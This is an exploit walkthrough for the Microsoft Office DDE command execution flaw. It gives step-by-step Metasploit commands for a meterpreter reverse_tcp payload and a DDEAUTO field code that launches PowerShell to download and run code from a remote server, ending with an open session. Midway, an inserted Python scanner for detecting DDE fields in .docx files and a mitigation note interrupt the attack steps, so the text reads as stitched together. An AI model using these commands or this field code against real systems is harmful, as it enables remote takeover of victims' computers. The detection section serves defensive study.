Exploits, Office

Exploit Microsoft Office DDE Command Execution Vulnerability

Download module

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Move module into framework

mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

Open Metasploit and load exploit

msfconsole
reload_all
use exploit/windows/dde_delivery

Set the server host

set SRVHOST 192.168.1.10

Choose payload and run it

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 443
exploit

Paste the field code into any Word/Excel document.

  • Open Word/Excel.
  • Create a new document/sheet.
  • Insert tab -> Quick Parts -> Field… -> (Formula).
  • Right click on !Unexpected End of Formula -> Toggle Field Codes.
  • Change {= \* MERGEFORMAT} to {DDEAUTO C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\cmd.exe "/C powershell -C;IEX((new-object system.net.webclient).downloadstring('https://x.x.x.x/ffff.txt'))"}
  • Save document.
  • The file retrieved from the server contains PowerShell code, which is passed to the Invoke-Expression (IEX) cmdlet and executed.
  • Imagination?
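As an added defensive check (not part of the original walkthrough or of the Metasploit module), the following Python script scans a .docx for the DDE/DDEAUTO field code that the steps above plant via Insert -> Quick Parts -> Field. It reads the OOXML parts under word/, collects field instructions from both the simple (w:fldSimple) and complex (fldChar/instrText) field forms, joins instruction text that Word has split across runs, and flags any instruction whose leading keyword is DDE or DDEAUTO. The sample document it builds in memory is constructed for the demo; the executable path and argument inside it are placeholders, not values from the page.

```python
# Added example (not from the original page): scan a .docx for DDE/DDEAUTO fields.
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"

# A field instruction whose first keyword is DDE or DDEAUTO. DDEAUTO is the variant
# that fires when the document is opened; plain DDE updates on demand.
DDE_RE = re.compile(r"^\s*(DDEAUTO|DDE)\b", re.IGNORECASE)


def extract_field_codes(part_xml: bytes) -> list:
    """Return every field instruction string found in one WordprocessingML part.

    Handles the simple form (<w:fldSimple w:instr="...">) and the complex form,
    where the instruction lives in <w:instrText> runs between a fldChar 'begin'
    and the matching fldChar 'end'. Word may split one instruction across several
    runs, so the fragments are joined before inspection.
    """
    root = ET.fromstring(part_xml)
    codes = [el.get(f"{{{W_NS}}}instr", "") for el in root.iter(f"{{{W_NS}}}fldSimple")]
    depth, fragments = 0, []
    for el in root.iter():
        if el.tag == f"{{{W_NS}}}fldChar":
            kind = el.get(f"{{{W_NS}}}fldCharType")
            if kind == "begin":
                depth += 1
            elif kind == "end" and depth > 0:
                depth -= 1
                if depth == 0:  # outermost field closed: emit its joined instruction
                    codes.append("".join(fragments))
                    fragments = []
        elif el.tag == f"{{{W_NS}}}instrText" and depth > 0:
            fragments.append(el.text or "")
    return codes


def scan_docx(docx_bytes: bytes) -> list:
    """Return (part name, field code) pairs for every DDE/DDEAUTO field in a .docx.

    Body, headers, footers and notes are all XML parts directly under word/ and any
    of them may carry fields, so each is inspected. Legacy binary .doc files are not
    OOXML and are out of scope for this scanner.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        for name in archive.namelist():
            if not (name.startswith("word/") and name.endswith(".xml") and name.count("/") == 1):
                continue
            for code in extract_field_codes(archive.read(name)):
                if DDE_RE.match(code):
                    hits.append((name, code.strip()))
    return hits


def build_sample_docx(fields: list) -> bytes:
    """Construct a minimal .docx (sample data built for this demo) with one complex
    field per entry; each entry is the instruction text split into runs."""
    paragraphs = []
    for fragments in fields:
        runs = "".join(
            f'<w:r><w:instrText xml:space="preserve">{escape(f)}</w:instrText></w:r>'
            for f in fragments)
        paragraphs.append(
            '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>' + runs +
            '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
            '<w:r><w:t>!Unexpected End of Formula</w:t></w:r>'
            '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>')
    document = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                f'<w:document xmlns:w="{W_NS}"><w:body>{"".join(paragraphs)}</w:body></w:document>')
    content_types = (f'<?xml version="1.0" encoding="UTF-8"?><Types xmlns="{CT_NS}">'
                     '<Default Extension="xml" ContentType="application/xml"/>'
                     '<Override PartName="/word/document.xml" ContentType="application/vnd.'
                     'openxmlformats-officedocument.wordprocessingml.document.main+xml"/></Types>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("[Content_Types].xml", content_types)
        archive.writestr("word/document.xml", document)
    return buf.getvalue()


# Constructed sample: the harmless formula field the walkthrough starts from, plus a
# DDEAUTO field whose keyword is split across two runs (placeholder path and argument).
SAMPLE_FIELDS = [
    ["= ", "\\* MERGEFORMAT"],
    ["DDEA", "UTO C:\\placeholder\\app.exe ", '"placeholder-argument"'],
]

if __name__ == "__main__":
    for part, code in scan_docx(build_sample_docx(SAMPLE_FIELDS)):
        print(f"{part}: {code}")
```

Run it against a real file by passing the file's bytes to scan_docx; a hit means the document will attempt a DDE launch on open (DDEAUTO) or on field update (DDE), so treat it as malicious unless the author is known and the target executable is expected. On the endpoint side, Microsoft's advisory ADV170021 documents the registry settings that disable automatic DDE updates in Word and Excel, which removes the on-open trigger this walkthrough relies on.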

Open the Meterpreter session

sessions 1
sysinfo